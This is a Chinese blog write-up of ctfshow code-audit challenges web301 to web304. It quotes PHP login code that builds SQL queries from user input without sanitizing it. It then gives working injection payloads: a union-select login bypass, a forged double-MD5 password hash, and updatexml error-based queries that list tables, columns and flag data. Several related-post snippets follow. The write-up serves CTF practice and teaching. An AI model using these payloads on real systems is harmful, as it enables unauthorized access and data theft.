【ctfshow持续更新中】web入门-代码审计

已于 2025-04-13 13:30:52 修改
阅读量157 收藏
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 网络安全 ctfshow 文章标签: sql 网络安全
于 2025-02-11 23:46:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55830703/article/details/145581484

 

web301

根据下载的代码,可以看到checklogin.php这个文件:

$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";

if(!strcasecmp($userpwd,$row['sds_password'])){
	$_SESSION['login']=1;
	$result->free();
	$mysqli->close();
	header("location:index.php");
	return;
}

发现sql语句没有过滤,直接使用联合注入

第二个if中告诉我们只有通过sql语句查到的密码和我们的密码相同时才可以登录

1闭合,联合查询123,这样返回的密码是123了,最后只要登录的密码也为123就可以拿到flag了

1' union select 123 #
123

web302

strcasecmp对比两个有什么区别,不区分大小写,相同输出0

搜索sds_decode得到:

<?php
function sds_decode($str){
	return md5(md5($str.md5(base64_encode("sds")))."sds");
}
?>

相当于给密码加密了

在本地运行一下这个加密的

<?php
$str=1;
echo md5(md5($str.md5(base64_encode("sds")))."sds");
?>

这样就可以注入了

用户名:1' union select 'd9c77c4e454869d5d8da3b4be79694d3' #

密码:1

就可以登录进去得到flag了 

web303

先看文件checklogin.php:

strlen返回字符串的字节数(整数)

if(strlen($username)>6){
	die();
}

对username进行了长度限制

看下一个文件sds_user.sql:

INSERT INTO `sds_user` VALUES ('1', 'admin', '27151b7b1ad51a38ea66b1529cde5ee4');

 从这可得知,账号是admin,密码也是admin,因为密码进行了加密,文件在fun.php中

在文件中找到$sql的语句:

文件checklogin.php:
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";

文件dpt.php:
$sql="select * from sds_dpt order by id;";

文件dptadd.php:
$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";

由此可以看出,sql注入点在dptadd.php中,先找到dpt.php网页,根据代码提示,使用dptadd是在新增的时候

 

根据sql语句可以进行报错注入

查数据库名字:

1' or updatexml(1,concat(0x7e,(database())),0) or ' #

以此类推

查表名:sds_fl9g

1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),0) or ' #

查字段名:flag

1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='sds_fl9g')),0) or ' #

获取数据:

因为flag没有显示完全,所以用substr截取的方式获取全部

1' or updatexml(1,concat(0x7e,(select substr(group_concat(flag),1,30) from sds_fl9g)),0) or ' #

web304

增加了全局waf

function sds_waf($str){
	return preg_match('/[0-9]|[a-z]|-/i', $str);
}

代码文件还是web303的,按照前面做法先使用账户admin密码admin进行登录,进行注入

根据注入结果,和web303一样,(这里我也不知道waf咋过滤的,我用web303的注入语句去注入也可以得出)

注入语句:

查表名:sds_flaag

1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),0) or ' #

查字段名:flag

1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='sds_flaag')),0) or ' #

获取flag:

1' or updatexml(1,concat(0x7e,(select substr(group_concat(flag),1,30) from sds_flaag)),0) or ' #

 

 

 

CTFSHOW-WEB入门代码审计
Re_ly0n的博客
11-02 576
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
ctf_show笔记篇(web入门---代码审计
whale_waves的博客
03-13 1619
在dao.php文件找到了当最后销毁序列化时调用close(__destruct魔法函数), 这里就要用到__construct魔法函数, 当执行new实例化的时候就会调用, 一会儿再去找哪里实例化了dao这个类, 将$this->config=new config()修改为$this->conn->=apt()这里$this->config->cache_dir指向了config类里的cache_dir变量, 刚好又是个public公共便变量可以修改。这里的'问好'像下面一样加密一下。
CTFshow--Web--代码审计
pwfortune的博客
07-29 1775
service/service.php , 也存在 clearCache()的调用, 而且在logout.php里面require了service.php,查询不到内容, 会在数据库中创建一个数据 123 , 那么这个123就会作为一个返回的数据, 用以跟用户输入的密码进行比较 , 相匹配的话就行登录进去了。在index.php下面 ,能够调用 checkVersion()函数 , 虽然header 头跳转了,但是还是会执行后面的代码。向服务端发送请求时,服务端会等待我们发送数据,处于wait状态。
Ctfshow web入门 代码审计web301-web310 详细题解 全
Jay17的博客
09-21 3430
Ctfshow web入门 代码审计web301-web310 详细题解 全
CTFshow代码审计 web301-310
cht6667的博客
02-23 1263
CTFshow代码审计部分个人做题记录
ctfshow web入门 nodejs334-338
2301_80548709的博客
04-27 902
这题入门题,下载附件以.zip的格式打开,拿到源代码,进行代码审计,发现,按照他的逻辑.输入正确的用户名及密码即可登录,这里需要注意的是,对于这个代码的逻辑,是你输入的用户名是不能等于CTFSHOW的,所以我们输入他的小写即可,因为它后面有toUppercase()函数,会将我们输入的大写,所以不用管.js大小写特性参考。
CTFshow之文件上传web入门151关-161关解密。包教包会!!!!
2301_77578012的博客
05-23 1536
当网站进行扫描时,会将.user.ini文件指向路径内容包含在首页代码处(如index.php、index.html等),使用参数auto_prepend_file(包含至首页文件头部)和auto_append_file(包含在首页文件尾部)进行配置。发送一句话木马,修改content-type值为:image/png,此处注意一下,我直接上传.php文件发现无法通过,定睛一看才发现前端验证还没关,汗颜!上传1.png的木马。2.上传.user.ini文件(使用bp中repaeater重发器功能进行上传)
CTFSHOW WEB入门 命令执行 web29-web36
m0_53194713的博客
06-26 1436
ctfshow web29 web30 web31
ctfshow web入门 web87
2401_83272517的博客
05-25 1253
入门2年半还没有入门的菜坤的日常wp
ctfshow web入门 代码审计
Sentiment的博客
02-12 3003
web301
ctfshow web入门(代码审计)
Blazing-Angel的博客
07-19 456
ctfshow
ctfshow 代码审计
qq_45951598的博客
05-21 837
web301 这里看了一下文件发现,就一些登入页面文件 然后简单看了一下文件,定位到checklogin.php这个文件,做个简单的代码审计 <?php error_reporting(0); session_start(); require 'conn.php'; $_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:""; //判断当前传入的userid是否为空,空的话返回为空 $_POST['userpwd']=!empty(
CTFshow-WEB入门-代码审计
feng的博客
02-22 1816
前言 开始快乐的代码审计篇。 web301 源码下载下来分析一波,大部分都是无用的文件,主要还是在checklogin.php那里: $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; $result=$mysqli->query($sql); $row=$result->fetch_array(MYSQLI_BOTH); if($result->
CTF web题日常积累——代码审计题型
zhy的博客
03-27 4848
1.变量1 题目来源: https://ctf.bugku.com/challenges 这是一个入门代码审计题,难度不大,主要在于看代码逻辑和正则。 题目链接直接打开便是一段php源码,直接观察这个代码。明显可以看到一个正则表达式,这个正则表达式意为匹配都是字母的串。 而这里明显光是正则表达式是不够的,继续仔细看,在最后有一个$$...
ctf.show WEB入门-代码审计
~airrudder~
11-30 4613
ctfshow 代码审计web301-web310
[CTFshow web入门]代码审计
Npceer-一位网安初学者的博客
08-09 586
前言 最近状态不太对 挺迷茫的 就先回来写点题练习练习 暑假也进入后半段了 摸鱼摸不动了 最近就学一下代码审计吧 找几个小CMS复现一下漏洞 然后在跟这Y4和feng师傅的博客复现一些框架好了 也稍微学一下工具的使用 sqlmap啊seay啊啥的 文章目录前言web301web302web302 web301 基础题 随便看一下 sql语句没有任何过滤 直接联合注入就行 $sql="select sds_password from sds_user where sds_username='".$usern
CTFSHOW 代码审计
羽的博客
12-19 4714
文章目录web301web302web303web304web305web306web307web308web309web310 web301 下载下来源码,发现checklogin.php里面的sql语句没有任何的过滤。 所以直接注入就可以了。用sqlmap跑了下得到用户名密码 admin ctfshowwwww登陆进去就有flag python sqlmap.py -u http://e62c174a-c4d4-4a58-a392-a41bfca926ee.chall.ctf.show/checkl
ctfshow web 5 php的代码审计
m0_46412682的博客
07-13 265
ctfshow web 5 php的代码审计 一打开就是一段php的代码 那我们来分析一下,get传参,有两个变量v1 和v2,两个变量必须同时存在,ctype_alpha(v1)判断变量是否全是字母,is_numeric(v2)是判断变量v2是否都是数字,还有一个是判断md5之后是否相同,所以我在网上找了md5之后的值是一样的,md5(‘240610708’) ==md5(‘QNKCDZO’) 所以直接传参 flag{d76aff5b-e619-4eb8-b0ff-9bbc0627170b} ...
ctfshow web入门 代码审计 web303
最新发布
01-04
对于CTFShow平台上Web入门代码审计题目web303,虽然具体细节未直接提及于提供的参考资料中,但从其他相似题目的解析中可以获得一些通用的解题方法和技术。 #### 题目背景理解 通常这类题目涉及的是对给定PHP或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值